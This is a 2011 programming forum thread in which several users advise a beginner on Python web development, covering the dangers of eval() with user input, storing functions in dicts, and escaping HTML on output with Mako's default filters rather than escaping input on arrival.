> Also, IIRC, Python dict values have to be objects (str, int, list, tupple, dict, or class instances), and can't be code itself. If I'm wrong on that, please correct me.


Everything in Python is an object, including functions and bound methods.  You can put whatever you want as a dict value.



Summercat said:


> I'm not using eval(), but have no clue why it would be a bad idea to.


Generated code is slow, hard to maintain, and is a minefield of security issues if it includes user input.  It's easy to construct a Python one-liner that would delete everything on your hard drive; imagine dumping that blindly into eval().



Summercat said:


> As above, I am using cgi.escape() on my inputs, which seems to do the job.


But that's still hazardous, because it requires you to use cgi.escape() every single place you print HTML.  If you forget just a single time, it was all for nothing.

Use a template library that will auto-escape for you.  Mako can do this with a default filter.

I'm not hard to find if you want me to go into detail on any of this.


----------



## Summercat (Feb 19, 2011)

Eevee said:


> Apply that cautiously.  You often won't have time (or inclination) to go back and fix it.  Better to do it as rightly as you can the first time around.



For later on, yes, I understand. However, at this point - still learning how to get things to work, period. I fully take in your point about doing it rightly the first time around, but I submit that it may be better to get it done than not at all.



> Don't use CGI; it's old and slow and busted.  Use a WSGI framework like Pyramid or Flask or Bottle.


I believe I am using WSGI, actually - it's whatever CGI style Dreamhost has working on their servers.



> Objects, tuples, sets are all common.



Not quite what I meant - which would be my bad. I was refering to in-built Python objects, as opposed to an external DB.




> Everything in Python is an object, including functions and bound methods.  You can put whatever you want as a dict value.



Functions are objects? I didn't know this. So I can have dict[key] = def function(): ? How would you call that, dict[key] or dict[key]()?




> Generated code is slow, hard to maintain, and is a minefield of security issues if it includes user input.  It's easy to construct a Python one-liner that would delete everything on your hard drive; imagine dumping that blindly into eval().


Noted, then. I'll avoid using eval().



> But that's still hazardous, because it requires you to use cgi.escape() every single place you print HTML.  If you forget just a single time, it was all for nothing.
> 
> Use a template library that will auto-escape for you.  Mako can do this with a default filter.



Generally I place it every time I need to get an input. While it make look horrible, I don't see why user_input = cgi.escape(d.get("input")) (as a not-exactly-working example) wouldn't work. Failing that, the two-line of get and escape would work as well. Heck, the script should know which inputs it's looking for, have a list with the input names, something like for i in input_list, i = d.get(i), i = escape(i). I'd have to sit down and try it (Will do so after tonight's project of re-arranging my post furniture) to see if that would work, but as of right now I'm not certain why it wouldn't.



> I'm not hard to find if you want me to go into detail on any of this.


 
I've been popping into fa-dev on Furnet, but since I resolved to ask you stuff I haven't seen you on when I've been in there. I'm guessing scheduling conflict, since I'm usually on and working on this from 10pm to 5:30am my time.


----------



## Eevee (Feb 20, 2011)

Summercat said:


> I believe I am using WSGI, actually - it's whatever CGI style Dreamhost has working on their servers.


WSGI isn't a "style of CGI"  

Are you doing this nonsense, or FastCGI, or what?



Summercat said:


> Functions are objects? I didn't know this. So I can have dict[key] = def function(): ? How would you call that, dict[key] or dict[key]()?


Functions are objects, methods are objects, classes are objects, modules are objects, integers are objects, everything is an object.

d[key] is the function, so yes, d[key]() would call it.



Summercat said:


> Generally I place it every time I need to get an input. While it make look horrible, I don't see why user_input = cgi.escape(d.get("input")) (as a not-exactly-working example) wouldn't work.


I _did_ just call it "PHP brain-damage" a few posts ago.  8)

Your user input is then not actually user input; it's been reformatted to fit into some particular foreign language.  You can't do anything meaningful with it from that point on except spit it back out to the user, unaltered and uninspected and unstored.  You can't even tell me how long that string is, now.

Only escape on the way _out_.  Data within the flow of your program should always be pure and high-level, unencumbered by nonsense like text encodings or escaping for some particular target.  What if you want to write that string to a log file or save it in a db somewhere?  You've already lost the original.



Summercat said:


> I've been popping into fa-dev on Furnet, but since I resolved to ask you stuff I haven't seen you on when I've been in there. I'm guessing scheduling conflict, since I'm usually on and working on this from 10pm to 5:30am my time.


I'm not usually in #fa-dev.


----------



## nrr (Feb 21, 2011)

Eevee said:


> Only escape on the way _out_.  Data within the flow of your program should always be pure and high-level, unencumbered by nonsense like text encodings or escaping for some particular target.  What if you want to write that string to a log file or save it in a db somewhere?  *You've already lost the original.*


 
Emphasis mine.  Data loss is a disaster.


----------



## Summercat (Feb 21, 2011)

nrr said:


> Emphasis mine.  Data loss is a disaster.



FFFFI hate how I click "Reply to Post" when using quick-reply and it eats my post. So shorter version:

Tutorial I used had the examples escaping on the way in. I don't see how escaping on the way out preserves anything special, unless get/post has more data than just the string. One day to solve it would be to use something like escaped_data = escape(data), thus having both escaped and 'raw' versions.

If you two have a suggestion in what direction to look at, I'd appreciate it - unless you really mean putting something like, erm...

I was going to post an example here, but then I opened up some code to try to figure out how it would work, and I'm not really seeing how to do it o.o; I guess I need to spend some more time with forms and how get/post works. I guess that'll be my Tuesday night task at work (If my boss didn't be the lazy fudgetard in regards to processing all the random old paperwork I found and actually did it, as opposed to leaving it to me).


----------



## Love! (Feb 21, 2011)

i am going to print out a copy of this thread
between the pleasantly overwhelming dizziness and the nagging twinge of regret at dropping out of school, reading it makes me feel like i'm drunk

horrible jokes aside, um, is there a version of this thread in layman's terms? i really am interested in this, i just don't have the technical understanding yet


----------



## Eevee (Feb 21, 2011)

Summercat said:


> Tutorial I used had the examples escaping on the way in. I don't see how escaping on the way out preserves anything special, unless get/post has more data than just the string.




```
# I type in "<3"
print data
# you just printed "&lt;3", which is not what I typed
```



Summercat said:


> One day to solve it would be to use something like escaped_data = escape(data), thus having both escaped and 'raw' versions.


And then you still can't do anything to the original data, or the escaped version gets out of sync.



Summercat said:


> If you two have a suggestion in what direction to look at, I'd appreciate it


I told you.  Solve this in the template layer.

```
from mako.template import Template
print Template(u"my name is ${name}", default_filters=['h']).render(name=u"<3")
# prints: my name is &lt;3
```
`h` is Mako's HTML-escaping filter.  `default_filters` applies it to every single ${} expression in the template.  Problem solved.


----------



## Summercat (Feb 21, 2011)

Eevee said:


> ```
> # I type in "<3"
> print data
> # you just printed "&lt;3", which is not what I typed
> ...


 
Honestly forgot you mentioned templates. I'll blame my mind being three places at once and probably about only 75% awake when reading about it. 

Allright, I spend some time looking that one up.  I was just going to ask some questions, then I realized more than likely they'd be answered by the docs. Still going to toss one out here:

In the code example, can mako use, say, var = "<3", then .render(name=var)? I figure this is answered in the docs, though.


----------



## Ricky (Feb 24, 2011)

Summercat said:


> Tutorial I used had the examples escaping on the way in. I don't see how escaping on the way out preserves anything special, unless get/post has more data than just the string. One day to solve it would be to use something like escaped_data = escape(data), thus having both escaped and 'raw' versions.


 
It's not a matter of deciding when is a more beneficial time to escape stuff.  It's a matter of why you are escaping things in the first place.

If you're displaying text in an HTML document, you should escape characters that have a special meaning in HTML.

If you are inserting a parameter into anything and potential characters have a special meaning, they should be properly escaped.

That's why you escape on display.  What they are saying is if you escape the data at some random time before that, you're going to fuck things up at some point and have escaped data when you're not expecting it (and possibly many iterations of this).

The thing is, if you DON'T escape these characters when you should you will not only open potential security holes but you will end up breaking stuff when users put them in and you're not expecting it.  For example, if someone was giving an example of HTML code in a field that ends up a paragraph in your document you don't want it to be rendered as actual HTML elements on the page but rather their escaped equivalent.

Dunno if that helps.


----------

